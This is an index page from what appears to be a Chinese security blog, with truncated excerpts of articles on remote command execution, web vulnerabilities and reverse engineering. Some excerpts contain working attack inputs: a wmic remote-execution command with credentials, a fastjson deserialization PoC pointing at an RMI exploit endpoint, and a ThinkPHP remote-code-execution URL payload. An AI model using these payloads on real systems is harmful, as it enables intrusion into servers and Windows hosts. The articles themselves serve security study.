windows远程执行cmd命令的9种方法

windows远程执行cmd命令的9种方法
一、远程执行命令方式及对应端口:  IPC$+AT 445  PSEXEC 445  WMI 135  Winrm 5985(HTTP)&5986(HTTPS) 二、9种远程执行cmd命令的方法: 1.WMI执行命令方式,无回显: wmic /node:192.168.1.158 /user:pt007 /password:admin123 process call create "cmd.exe /c ipconfig>d:\result.txt" 2.使用Hash直接登录Windows(HASH传递) 抓取windows hash值,得到administrator的hash: 598DDCE2660D...
2019年08月15日 文章转载 暂无评论 喜欢 4 阅读 6,651 views 次 阅读全文

前端安全系列(一):如何防止XSS攻击?

前端安全系列(一):如何防止XSS攻击?
前端安全 随着互联网的高速发展,信息安全问题已经成为企业最为关注的焦点之一,而前端又是引发企业安全问题的高危据点。在移动互联网时代,前端人员除了传统的 XSS、CSRF 等安全问题之外,又时常遭遇网络劫持、非法调用 Hybrid API 等新型安全问题。当然,浏览器自身也在不断在进化和发展,不断引入 CSP、Same-Site Cookies 等新技术来增强安全性,但是仍存在很多潜在的威胁,这需要前端技术人员不断进行“...
2019年05月24日 文章转载 暂无评论 喜欢 0 阅读 2,057 views 次 阅读全文

密码保护:fastjson =< 1.2.47 反序列化漏洞浅析

密码保护:fastjson =< 1.2.47 反序列化漏洞浅析
poc {"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}}} 最近据说爆出来一个在hw期间使用的fastjson 漏洞,该漏洞无需开启autoType即可利用成功,建议使用fastjson的用户尽快升级到> 1.2.47版本(保险起见,建议升级到最新版) 环境准备 阅读本篇文章之...
2019年07月11日 文章转载 要查看留言请输入您的密码。 喜欢 2 阅读 3,892 views 次 阅读全文

密码保护:[原创]小X书7.5版本shield加密杂谈

密码保护:[原创]小X书7.5版本shield加密杂谈
小红书7.5版本shield加密 目录                  1 shield加密so定位:                  2 分析libxyass.so分析                          2.1 初见libxyass. so                          2.2 libxyass.so dump并修复                                  2.2.1 手动修复                                  2.2.2 frida dump_so 修复                  3 unidbg调用libxyass. so                  4、pyt...
2021年09月06日 文章转载 要查看留言请输入您的密码。 喜欢 24 阅读 11,390 views 次 阅读全文

thinkPHP 5X 在PHP7以上环境下的 GETSHELL

thinkPHP 5X 在PHP7以上环境下的 GETSHELL
起因 thinkPHP 的命令执行漏洞已经过去好一阵子了,然而还有许多站并没有修复这个漏洞,今天恰巧让我遇到这么一个, 但是因为目标 PHP 版本是 7.2.14 导致 GETSHELL 变的异常麻烦,在各种折腾下最终成功,记录分享一波~ GETSHELL 过程 ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami?s=index/\think\Request/input&filter=phpinfo&...
2019年07月10日 文章转载 暂无评论 喜欢 2 阅读 5,697 views 次 阅读全文

SQL注入之盲注 case

SQL注入之盲注 case
遇到一个盲注,记录一下 在基于时间的盲注的时候,一般使用的是if语句,如果符合条件就sleep,但是部分不能使用逗号的场景下,还可以使用case when #condition then ... else ... end语句来代替if语句,参考http://dev.mysql.com/doc/refman/5.7/en/control-flow-functions.html。 需要将数据切换multipart/form-data方式发送 # coding=utf-8 import time import requests from requests_toolbelt import M...
2018年10月12日 原创文章 暂无评论 喜欢 2 阅读 4,889 views 次 阅读全文

ECShop <= 2.7.x 全系列版本远程代码执行高危漏洞利用

ECShop <= 2.7.x 全系列版本远程代码执行高危漏洞利用
2018年9月1日,阿里云态势感知发布预警,近日利用ECShop全系列版本的远程代码执行漏洞进行批量化攻击量呈上升趋势,该漏洞可直接导致网站服务器沦陷,黑客可通过WEB攻击直接获得服务器权限,利用简单且危害较大。因此,阿里云安全专家提醒ECShop系统用户及时进行修复。 —— ECShop全系列版本远程代码执行高危漏洞分析 本文我们将使用 VulnSpy 的在线 ECSHOP 环境对漏洞进行复现和利用演示。 点击右上方 STA...
2018年09月03日 文章转载 暂无评论 喜欢 0 阅读 2,325 views 次 阅读全文

PHP反序列化漏洞学习(一)

PHP反序列化漏洞学习(一)
前言:PHP反序列化也是web安全中常见的一种漏洞,这次就先来大致了解一下PHP反序列化漏洞的基础知识。 一、PHP序列化和反序列化 在学习PHP反序列化漏洞时,先来了解一下基础的知识。 (一)PHP序列化 函数 : serialize() 所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。 序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。 一开始看这个概...
2020年05月12日 文章转载 暂无评论 喜欢 1 阅读 2,199 views 次 阅读全文

SuperShell溯源反制-默认密钥/密码利用

SuperShell溯源反制-默认密钥/密码利用
介绍: https://github.com/tdragon6/Supershell Supershell是一个集成了reverse_ssh服务的WEB管理平台,使用docker一键部署(快速构建),支持团队协作进行C2远程控制,通过在目标主机上建立反向SSH隧道,获取真正的完全交互式Shell,同时支持多平台架构的客户端Payload,客户端Payload的大小为几MB,可以理解为在目标主机上部署了一个几MB的ssh服务器,然后获取了一个ssh shell;Supershell集成了客户端...
2023年10月08日 文章转载 暂无评论 喜欢 0 阅读 4,026 views 次 阅读全文